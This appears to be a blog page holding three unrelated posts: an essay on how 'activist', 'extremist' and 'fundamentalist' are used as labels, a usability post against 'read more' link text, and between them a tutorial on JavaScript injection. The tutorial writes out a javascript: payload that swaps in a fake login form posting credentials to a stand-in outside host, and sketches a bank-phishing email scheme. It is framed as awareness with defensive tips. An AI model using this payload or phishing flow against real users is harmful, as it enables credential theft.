Activist vs Extremist

“Well, she is an environmental activist,” or “He's a political extremist!”

We've all heard this, one way or another. These terms get word-smithed into various conversations as tiny little golden nuggets or strategically placed verbiage bombs of analysis to persuade the listener. I recall a day when these nouns had real meaning, but today they are generalized into social stereotypes.

Another such term was “fundamentalist” used specifically and most commonly along with a reference to someone involved with organized religion. But to be a fundamentalist you had to earn it. You didn't just “think” a certain way, you had to act our in a certain detrimental manner. “religious fundamentalist” were blowing themselves up or taking an entire 747 hostage.

Today these terms mean only one thing: you get involved with a goal of affecting some kind of outcome. The only other differentiating factor is whether that involvement is viewed as positive or negatively correlated with the person performing the analysis. For example, imagine someone who advocates for the environment. If they picketed dirty businesses or advocate frequently for public recycling, or attempt to get people to sign petitions, “well, she is an environmental activist.” The key is that you believe a certain thing and then that you try to have an influence on the world around you. But activist isn't a dirty word. It just seems to mean “involved” but in a way that the person doing the analysis prefers.

Now let's look at the other side. If someone is involved in wanting to influence the world around them toward their values but the person doing the analysis of their behavior doesn't like what they are doing, then you simply change the noun from “activist” to “extremist.”

Let's go back to the environmentalist. Take them off the picket line and simply have them sign a petition to require all city management to recycle. They value the environment and they are taking action via their signature. But if people don't like that petition they just cast it as an “petition put forth by environmental extremists,” and suddenly it gets the right negative spin. In this scenario, “extremist” is basically reduced to meaning “I don't like your cause because I don't share your perspective and I will call it extreme because you are getting involved but not in ways that I support."

Back to “fundamentalist.” The greatest abuse of word-smithing seems to happen around this generalized label. According to the free dictionary the term is defined as (1) a religious group, (2) adhering to fundamental core beliefs, (3) who are intolerant of other perspectives, and (3) who are militant (historically.) But that definition is changing. Today people get called “fundamentalists” for simply promoting a piece of legislation. In fact, to judge something as “not tolerant” is a pretty subjective act in reality. For example, let's remove militant and religious from the definition altogether and see how this terms could be applied under a looser definition like what we experience today.

Let's go back to the environmentalist. They want a bill that requires city management offices to recycle. In that law they in fact want to require that recycling be mandated. So, any law like this qualifies as “intolerant” because it makes no room for alternative perspectives on recycling. By definition only one perspective wins and it would be called "a law" and laws have a funny way of not tolerating being broken. Next the proposition of recycling would be considered adherence to a core environmental protective belief. It isn't a loose definition. It is a core belief that drives one to feel that to protect the environment we need to save it from ourselves.

(Before I go on, I want you to understand that I am not advocated against recycling. It is just an analysis of terms here. Please stick with me. We are almost there.

So by examining any effort to move a belief into law we could well define the advocates of that belief as “fundamentalist.” Suddenly the term gets smothered to nothing and what was an “environmental activist” has moved to “environmental extremist” or worse yet “environmental fundamentalist.” But these are just words.

Crazy as it may seem I think it is time to rethink our dialog. It is one thing to examine history and talk about our values and align ourselves with belief systems or liken one thing to another thing to more clearly understand it. But these terms are just labels meant to influence how you feel about the person or the associated defining adjective...

education advocate, animal rights activist, political extremist, religious fundamentalist, etc.

The more obvious attempts at influencing you come in their one-two combination as they sandwich the adjective...

extreme left-wing fundamentalist

So the next time you get into a conversation and someone starts talking about an activist, extremist or fundamentalist, don't assume you know what they mean. Maybe they are imagining the old definition of fundamentalist, and you might want to ask a refining question. For heaven's sake, don't get sucked into the buzzword war...

“Those crazy neo-environmental fundamentalists are trying to get my office to recycle.”

You reply, “Did they hijack your garbage can again?”

Your friend ponders your question, "Ah, no, but they are trying to create a rule about recycling."

In an effort to cool his jets you offer an equally silly buzzword-laden reply, "Those fascist totalitarianists should keep their garbage-management-values to themselves and let us LIVE OUR LIVES!!!"

Hack My Web Site (using JavaScript Injection)

Wow. I like to keep myself educated on how people are hacking stuff so I can build secure solutions, but I may have bumped into a hack that is pretty darned smart and takes a bit of a techy to at least detect. Many of you may have heard about SQL Injection, where you put sql queries into an inputbox and the standard errors end up coming back telling you more information than you should get to know about the database behind a web site. Well this blog article is about how to take over part of a web site and spoof parts of the page using a technique called javascript injection. I will show you how it works, the likely way it will be implemented and how to watch for it.

To start: How it works. First off, understand this is an internet browser hack, and not a web site hack, so unless developers of internet browsers change how stuff works today, this technique should work going forward, dispite what people do on their site to dodge this. Understand that what I am about to tell you is educational with the hope that you education friends and family about how this works so they can avoid being attacked.

IF YOU DO ANY OF THIS, YOU COULD GET ARRESTED BECAUSE YOU WOULD BE BREAKING THE LAW.

So, now, on with it. We are going to hack my web site: http://enginpost.com so pop another browser window and load that URL.

Most modern browsers give you the ability to enter javascript in the address bar for testing purposes. This inherent weakness is what we are about to exploit.

Here we go:

1. Click on my resume and notice where the content goes to on the webpage. If you were to examine the HTML under the page you would see that the content is being Fjaxed (like Ajax, but better) into the DIV with the ID "FlashJxContent." You can quickly view the content of whatever is currently in that DIV by pasting the following code into your browsers address bar:
   
   javascript: alert(document.getElementById('FlashJxContent').innerHTML)
   
2. That should show you the HTML inside the DIV. Now let's image my website was secure and people would come to it to login. I am a nasty human being and I want to harvest peoples login usernames and passwords. So what I want to do is create a fake form to gather this information and submit the details to a page on another website (where I gather the info and save it to my little database.) Since we know how to read the innerHTML of a DIV, we should be able to write to it as well.
3. I want to get a fake form into the DIV where the HTML looks something like:
   
   
   
   Enter Username:
   
   Enter Password:
   
   
   
   
   
   Notice that the form submits the results to another website. Horrible, right?
4. To get this form into an existing webpage, paste the following javascript into the URL:
   
   javascript:void(document.getElementById('FlashJxContent').innerHTML = " <form action='http:www.SomeTemporarySite.com/steal_logins.asp' method='get'> Enter Username: <input id='UID' type='text'><BR /> Enter Password: <input id='PWD' type='password'> <input type='submit' value='Login'> </form>")
   
   

Wow, huh? Notice that the title in the address bar shows that we are on the same site, even though the URL is a little wierd (but then again, how many users really understand what is going on in a URL?) If you wanted to change a few more areas of the page, the bad dude only has to add a semicolon after the double-quote and before the end parenthesis to add another line of javascript and write to another DIV at the same time.

HOW would this likely be implemented?

I hate to write this part because people could use this like instructions, so I won't go into a ton of specific detail, but basically...

If someone sent out an email saying you need to go to your account and fix something at your bank, the link could say "login to your bank" in your HTML-enabled email, but really point to that nasty website. The page that loads could say "loading Your Community Bank secure login..." and pop another window that hides the address bar. This window would really load your banks website. Then a few seconds later the original page would load the javascript into the location on that other popped page (I have not tested this, but I think I would work, since we opened the page to begin with.) At that point you would be on your banks website but filling out a form that really has nothing to do with your website.

HOW do you gaurd family and friends against this?

1. Tell them not to fill out web forms that don't show the address in the address bar of the browser. if the URL seems funny, don't use the form.
2. Watch for the address to where the form submits. If you hover over the submit button, notice that it tells you that it is headed away from the enginpost website (in the above example.) The average Joe may not be aware of this and it may seem a little techy a thing to do, but these days, that may yet be required.

Other than that, there isn't much more we can do to protect ourselves from this hack.

Click To Read More

Here is a pet peeve of mine. Sites, in an effort to appear usable put the same consistent link at the bottom of each of the content hints on their site’s landing page: “read more.” The idea simply is that you are giving them a reasonable sample of what the content consists of and if they want to read the entire piece then they need to click that fancy little link if they want to “read more.” Now, I am likely preaching to the choir here by even mentioning the next two points, but I consistently see people make this error. (At the end of the blog I recommend a new standard, so if you remain interested in why this is a problem, then read on.) Here are two very simple problems with the “read more” technique:

“read more” (or “Full Story” or “click here”) at a quick glance tells me nothing about what I am about to read more about. Assuming most people are buzzing your landing page, in search of (1) interesting content that they can (2) immediately click on, seeing “read more” just makes me slow down to read what was above it. The entire experience of “read more” kills the speed in terms of approachability, of people getting to your real content. The lesson here is that one should always link from meaningful text, not from simply verb ideas. Yes, you want them to “read more” but they want to read about something, not just more.

The number one indexed property of your website is your links. And what is, in fact, indexed then if you are too commonly using phrases like “read more”? Unless you are attempting to break some world record on getting the most hits for sites that are indexed around the key phrase “read more,” I recommend never using that as your link text again. If a piece of content in your site is about “hiking with relatives” then the link text should contain words like that, and not “read more.” When was the last time someone you knew hit google or yahoo and searched for the phrase “read more about hiking with relatives?

Now, you can likely verbalize the recommendation I am about to make since it was embedded into both above points. When you create links to expanded content (and I highly recommend not putting content other than content highlights on landing pages, but that is another blog), link to the content using highly meaningful link text that you would prefer getting googled on and that is easy to read from a user’s perspective. So, as the final example, assume the last paragraph here is a content highlight with appropriate link text:

Florida housing sex offenders under bridge
The sparkling blue waters off Miami's Julia Tuttle Causeway look as if they were taken from a postcard. But the causeway's only inhabitants see little paradise in their surroundings. Five men -- all registered sex offenders convicted of abusing children -- live along the causeway because there is a housing shortage for Miami's least welcome residents.